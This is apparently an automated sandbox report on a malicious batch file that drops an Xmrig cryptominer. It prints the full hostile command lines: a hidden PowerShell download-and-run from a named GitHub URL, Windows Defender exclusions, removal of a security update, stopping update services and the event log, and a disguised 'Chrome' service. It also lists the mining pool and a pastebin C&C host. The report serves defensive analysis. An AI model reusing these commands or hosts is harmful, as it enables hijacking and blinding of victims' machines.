Edit tour

Windows Analysis Report
eshkere.bat

Overview

General Information

Sample name:	eshkere.bat
Analysis ID:	1528950
MD5:	ae8361d48c8131bc78d0be59c8c95515
SHA1:	c3bc638c0556a66b4d98d56219e44adb2353235b
SHA256:	70ed9e7f429794334f660a314728f835421a8e203f55fd0a5ed3fde08967bebb
Tags:	batgithub-com-fruktoozikuser-JAMESWT_MHT
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop EventLog

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to a pastebin service (likely for C&C)

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: PowerShell DownloadFile

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious execution chain found

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4872 cmdline: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6584 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

1348.exe (PID: 6592 cmdline: "C:\Users\user\AppData\Local\Temp\1348.exe" MD5: 1A67A432E7AB0BCD2189F3F4142F2AE4)

powershell.exe (PID: 3304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 2296 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 748 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3816 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2988 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3608 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5256 cmdline: C:\Windows\system32\sc.exe delete "Chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3280 cmdline: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6912 cmdline: C:\Windows\system32\sc.exe start "Chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Chrome.exe (PID: 1868 cmdline: C:\ProgramData\Chrome.exe MD5: 1A67A432E7AB0BCD2189F3F4142F2AE4)

powershell.exe (PID: 6156 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3556 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 5084 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 6848 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2796 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3152 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 3128 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4140 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4680 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
eshkere.bat	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: powershell.exe PID: 4872	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_4872.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3304, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Chrome.exe, ParentImage: C:\ProgramData\Chrome.exe, ParentProcessId: 1868, ParentProcessName: Chrome.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6156, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", ProcessId: 3280, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1944, ProcessName: sc.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T14:02:44.743380+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.9	60174	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Chrome.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1348.exe	ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: eshkere.bat

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.9:49707 version: TLS 1.2

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\ProgramData\Chrome.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 95.179.241.203 443
Source: C:\Windows\explorer.exe	Network Connect: 104.20.4.235 443

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic	HTTP traffic detected: GET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 95.179.241.203 95.179.241.203
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 185.199.109.133 185.199.109.133

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:60174 -> 1.1.1.1:53

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/FBXiGyZ9 HTTP/1.1Accept: /Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6

Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000003.00000002.1568771405.000002576F85E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
